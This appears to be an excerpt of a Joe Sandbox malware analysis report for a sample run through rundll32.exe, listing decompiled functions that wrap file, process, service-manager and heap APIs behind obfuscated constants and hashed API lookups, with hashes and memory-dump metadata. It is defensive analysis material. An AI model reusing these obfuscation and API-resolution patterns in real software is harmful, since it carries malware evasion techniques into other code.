Opcode ID: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction ID: 57c78674e76fcf5bbef6c1d13676dcf238ec9be127e1a380fa2f95565e3ff4db
Opcode Fuzzy Hash: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction Fuzzy Hash: 43111CB5D0130DEBEB44CFE5D94A9EEBBB0FB04318F108189D51176291D3B85B489F81

Uniqueness

Uniqueness Score: -1.00%

Function 00720DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00720DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0071E171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E0071606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x00720deb
0x00720dee
0x00720df1
0x00720df6
0x00720dfb
0x00720e04
0x00720e0b
0x00720e18
0x00720e1c
0x00720e1f
0x00720e26
0x00720e32
0x00720e37
0x00720e3a
0x00720e41
0x00720e4c
0x00720e4d
0x00720e4e
0x00720e55
0x00720e58
0x00720e5f
0x00720e66
0x00720e6d
0x00720e78
0x00720e79
0x00720e7c
0x00720e8f
0x00720e9a
0x00720e9f

APIs

CloseHandle.KERNELBASE(68F2FB55,?,?,?,?,?,?,?,?,00000000), ref: 00720E9A

Strings

Hh, xrefs: 00720E58

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction ID: a1e237c12f67e5e3ea25d84c4d397bdb125428786a5aa9bd7838022b6a2a0a53
Opcode Fuzzy Hash: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction Fuzzy Hash: BA110374D0020DEBEF05DFA8C9469AEBFB5EB40304F60C599E924AB2A1D3B95B519F40

Uniqueness

Uniqueness Score: -1.00%

Function 00728409, Relevance: 1.6, APIs: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00728409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0071E171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E0071606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x00728411
0x00728416
0x00728418
0x0072841b
0x0072841e
0x0072841f
0x00728422
0x00728425
0x00728428
0x0072842b
0x0072842c
0x0072842f
0x00728432
0x00728435
0x00728437
0x0072843c
0x00728445
0x00728448
0x00728455
0x00728458
0x0072845f
0x00728462
0x00728469
0x00728470
0x00728474
0x0072847b
0x00728487
0x00728488
0x00728494
0x00728499
0x007284a0
0x007284aa
0x007284b5
0x007284b8
0x007284d7
0x007284ee
0x007284f5

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00006144,?,00000000), ref: 007284EE

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction ID: f07a90b1eb2e78fdca1c46bc91fe29ed22bd9122d662eda59aa985d6107c1b55
Opcode Fuzzy Hash: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction Fuzzy Hash: A731F472A01208FBDF05DF95CD098DEBFB6EF88304F108199F914A6250D7B69A60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00728165, Relevance: 1.6, APIs: 1, Instructions: 78
processCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00728165(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a4, struct _STARTUPINFOW* _a8, int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t47;
				int _t58;
				signed int _t61;
				void* _t65;
				WCHAR* _t66;
				WCHAR* _t67;

				_push(_a56);
				_t67 = __edx;
				_push(0);
				_push(_a48);
				_t66 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0071E171(_t47);
				_v16 = 0xa2fc;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffff1f57;
				_v16 = _v16 ^ 0xffff035a;
				_v12 = 0x8842;
				_t61 = 0xc;
				_v12 = _v12 * 0xd;
				_push(0xd8c5ba15);
				_v12 = _v12 / _t61;
				_v12 = _v12 ^ 0x0000f812;
				_v20 = 0x5415;
				_push(_t61);
				_push(_t61);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x001da8a2;
				_v8 = 0xf8b5;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x80bbebc5;
				_v8 = _v8 ^ 0x80bbcffb;
				_t65 = 0x47;
				E0071606F(_t65);
				_t58 = CreateProcessW(_t66, _t67, 0, 0, _a20, 0, 0, 0, _a8, _a44); // executed
				return _t58;
			}

0x0072816e
0x00728173
0x00728175
0x00728176
0x00728179
0x0072817b
0x0072817e
0x0072817f
0x00728182
0x00728183
0x00728186
0x00728189
0x0072818c
0x0072818d
0x0072818e
0x00728191
0x00728194
0x00728195
0x00728196
0x0072819b
0x007281a4
0x007281a8
0x007281af
0x007281b6
0x007281c3
0x007281c7
0x007281cf
0x007281d4
0x007281d7
0x007281de
0x007281e9
0x007281ea
0x007281eb
0x007281f2
0x007281f5
0x007281fc
0x00728203
0x00728207
0x0072820e
0x00728221
0x00728222
0x0072823a
0x00728242

APIs

CreateProcessW.KERNEL32(0BF52F2F,00000000,00000000,00000000,00000044,00000000,00000000,00000000,FFFF035A,?), ref: 0072823A

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction ID: e175b0ce227b2f91f3c08cf03b88c569ba7db52f0c9787e02cb108076f81817d
Opcode Fuzzy Hash: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction Fuzzy Hash: 1421E3B290020DBFEB058E94CC86CEEBFB9FB44358F408198F91466260D3759A51AB50

Uniqueness

Uniqueness Score: -1.00%

Function 007194A3, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E007194A3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t58;
				void* _t59;

				_t59 = __edx;
				_t58 = __ecx;
				E0071E171(_t40);
				_v20 = 0xa96c;
				_v20 = _v20 ^ 0xdb4b0424;
				_v20 = _v20 ^ 0xdb4b8f37;
				_v8 = 0xec5f;
				_t53 = 0x33;
				_v8 = _v8 * 0x67;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 | 0x13f5ff17;
				_v8 = _v8 ^ 0x13f5eace;
				_v16 = 0x37e2;
				_v16 = _v16 * 0x6f;
				_v16 = _v16 ^ 0x001836ab;
				_v12 = 0x82bd;
				_v12 = _v12 >> 4;
				_t32 = _t53 + 0x5f; // 0x92
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00002d3b;
				_t50 = E0071606F(_t32, 0xb6b01ae5, _t53, _t53, 0x2e5d2a1c);
				_t51 =  *_t50(_t58, 0, _t59, 0x28, __ecx, __edx, _a4, 0, 0x28, _a16, _a20, _a24); // executed
				return _t51;
			}

0x007194ae
0x007194b0
0x007194c1
0x007194c6
0x007194cf
0x007194d6
0x007194dd
0x007194ea
0x007194ee
0x007194f1
0x007194f5
0x007194fc
0x00719503
0x0071951a
0x0071951d
0x00719524
0x0071952b
0x00719534
0x00719537
0x0071953a
0x0071954d
0x0071955b
0x00719562

APIs

SetFileInformationByHandle.KERNELBASE(6EE5A95E,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0071955B

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction ID: 66185300db19a12a1e49150ff08e7370dc09836a50c1551d73b07d177ce075ce
Opcode Fuzzy Hash: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction Fuzzy Hash: 50215675E01208FBEB18DFA9C94AADEBFB5EB44304F108099F814AB291D3B45B15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00718289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00718289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E0071E171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E0071606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x00718290
0x00718295
0x0071829a
0x007182a8
0x007182ab
0x007182af
0x007182b5
0x007182b6
0x007182bd
0x007182c4
0x007182c8
0x007182cf
0x007182d6
0x007182dd
0x007182e4
0x007182eb
0x007182f2
0x007182f9
0x00718300
0x00718307
0x00718311
0x00718319
0x00718332
0x0071833d
0x00718343

APIs

DeleteFileW.KERNELBASE(00001B6C,?,?,?,?,?,?,00000000), ref: 0071833D

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction ID: 8493a645a15063bf7c69910c06721cae4fafb626c55e06a9b3416b55b040d7d2
Opcode Fuzzy Hash: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction Fuzzy Hash: 93115B75E0120CFBEB08DFE9C84A8DEBBB5FB58304F108198E410A62A4D3B84B499F50

Uniqueness

Uniqueness Score: -1.00%

Function 00713296, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00713296(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				signed int _t51;
				struct _SHFILEOPSTRUCTW* _t56;

				_push(_a4);
				_t56 = __ecx;
				_push(__ecx);
				E0071E171(_t40);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x1409b1;
				_v32 = 0x71de97;
				_v20 = 0x10af;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x000096e0;
				_v12 = 0xfce5;
				_v12 = _v12 ^ 0x58bbe0cf;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x02c5a2c7;
				_v16 = 0xf79b;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000fb9;
				_v8 = 0xa9b8;
				_v8 = _v8 ^ 0x8b980f22;
				_t51 = 0xc;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0ba20c7c;
				E0071606F(0x21a, 0xf44a99f2, _t51, _t51, 0x438313f0);
				_t49 = SHFileOperationW(_t56); // executed
				return _t49;
			}

0x0071329d
0x007132a0
0x007132a3
0x007132a4
0x007132a9
0x007132af
0x007132b3
0x007132ba
0x007132c1
0x007132c8
0x007132cc
0x007132d3
0x007132da
0x007132e1
0x007132e5
0x007132ec
0x007132f3
0x007132f7
0x007132fe
0x00713305
0x00713311
0x0071331c
0x0071331f
0x0071333e
0x00713347
0x0071334d

APIs

SHFileOperationW.SHELL32 ref: 00713347

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction ID: 9f0dded5ee4640d8e5339f7dc199dab1a588213e166577ef52bcd768c1ebdc40
Opcode Fuzzy Hash: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction Fuzzy Hash: 8C111971D0021DEBEB14DFD8C94AAEEBBB5EB44308F108199E414A7251C3B91B449F91

Uniqueness

Uniqueness Score: -1.00%

Function 00729EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00729EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0071E171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E0071606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x00729ef2
0x00729ef7
0x00729efa
0x00729efb
0x00729eff
0x00729f00
0x00729f05
0x00729f0f
0x00729f1b
0x00729f1e
0x00729f21
0x00729f28
0x00729f2f
0x00729f36
0x00729f4d
0x00729f50
0x00729f57
0x00729f5e
0x00729f65
0x00729f6c
0x00729f73
0x00729f7a
0x00729f8d
0x00729f9a
0x00729fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,00725A72,0000B2BF), ref: 00729F9A

Memory Dump Source

Source File: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000C.00000002.2102412245.0000000000710000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2102433761.000000000072F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction ID: dfb572e8e9438733d4f4a0ba3fbb1033cb5705ddb4f1b9598422f0024ae9c090
Opcode Fuzzy Hash: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction Fuzzy Hash: 4911F0B5D0122DEBDB04DFE9C84A9EEBFB4EF09344F108199E815A6250D3B45B608FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2800 Parent PID: 1492 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	961
Total number of Limit Nodes:	15

Executed Functions

Function 00227FC8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00227FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0021E171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E0021606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x00227fcf
0x00227fd2
0x00227fd4
0x00227fd7
0x00227fda
0x00227fdd
0x00227fdf
0x00227fe4
0x00227fed
0x00227ff4
0x00227ffb
0x00228002
0x0022800e
0x00228013
0x00228018
0x0022801f
0x00228029
0x00228034
0x00228037
0x0022803b
0x00228042
0x00228049
0x00228050
0x0022806f
0x0022807e
0x00228084

APIs

RtlAllocateHeap.NTDLL(?,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,?,?), ref: 0022807E

Strings

Ia, xrefs: 00228018
K=, xrefs: 00227FE4

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ia$K=
API String ID: 1279760036-1694132640
Opcode ID: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction ID: e80e67b39aa1ebb3dfc4c600677926d25b50fcafcaaa7b41f0c26887ffad6054
Opcode Fuzzy Hash: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction Fuzzy Hash: D8115971E00218FBEF04DFE5CD0A8DEBFB2FB45310F108189EA1466250C3B69A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 002229A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00222A76

Strings

-:, xrefs: 002229C4

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction ID: 856c98209bac94571938ad97b53960f2bebfe59e5017994071a342aef2611a17
Opcode Fuzzy Hash: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction Fuzzy Hash: 252123B2D01219BBDF15DFD5C84A8DEBBB5FF04758F108088E92866250D3B94B64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002130A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E002130A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021E171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E0021606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x002130ab
0x002130ae
0x002130b0
0x002130b3
0x002130b7
0x002130b8
0x002130bd
0x002130c6
0x002130cd
0x002130d4
0x002130db
0x002130e2
0x002130e9
0x002130f5
0x002130fa
0x002130ff
0x00213109
0x00213114
0x00213117
0x0021311e
0x00213125
0x0021312c
0x0021314b
0x00213154
0x0021315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 00213154

Strings

_;m, xrefs: 0021313C

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000E.00000002.2104363064.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2104409064.000000000022F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction ID: 380e6eb08f2297c6100af8c1fee9d00f29a3f7dd8d3e53dcb886c6058e86cdb1
Opcode Fuzzy Hash: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction Fuzzy Hash: BF113076D00218FFEB04DFE8CC468DEBBB1FB44310F108599E5146B252D7B55B519B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021E172, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0021E172(void* __ecx, void* __edx, void* _a4, int _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t41;
				void* _t48;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021E171(_t41);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2ee32c;
				_v20 = 0x466;
				_v20 = _v20 + 0xbcb9;
				_v20 = _v20 ^ 0x000097c2;
				_v8 = 0x1d17;
				_v8 = _v8 + 0xe3a6;
				_v8 = _v8 | 0x1371b482;
				_v8 = _v8 + 0xcae3;
				_v8 = _v8 ^ 0x13721426;
				_v16 = 0xc1c8;
				_v16 = _v16 + 0xffff2ba9;
				_v16 = _v16 ^ 0xffffbe8b;
				_v12 = 0x3352;
				_v12 = _v12 << 9;
				_v12 = _v12 | 0x4940d942;
				_v12 = _v12 ^ 0x4966c2a7;
				E0021606F(0x24f, 0xbee648b, __ecx, __ecx, 0x334b429d);
				_t48 = OpenServiceW(_a4, _a12, _a8); // executed
				return _t48;
			}

0x0021e178
0x0021e17b
0x0021e17e
0x0021e181
0x0021e185
0x0021e186
0x0021e18b
0x0021e192
0x0021e19e
0x0021e1a5
0x0021e1ac
0x0021e1b3
0x0021e1ba
0x0021e1c1
0x0021e1c8
0x0021e1cf
0x0021e1d6
0x0021e1dd
0x0021e1e4
0x0021e1eb
0x0021e1f2
0x0021e1f6
0x0021e1fd
0x0021e21c
0x0021e22d
0x0021e232

APIs

OpenServiceW.ADVAPI32(4966C2A7,000097C2,FFFFBE8B,?,?,?,?,?,?,?,?,?,?), ref: 0021E22D

Strings

,., xrefs: 0021E192

Memory Dump Source

Source File: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

